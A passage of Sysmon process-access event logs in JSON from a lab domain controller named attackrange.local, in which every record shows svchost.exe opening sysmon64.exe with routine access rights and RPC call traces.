05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1369,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1370,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1371,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1372,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1373,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1374,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1375,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1376,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 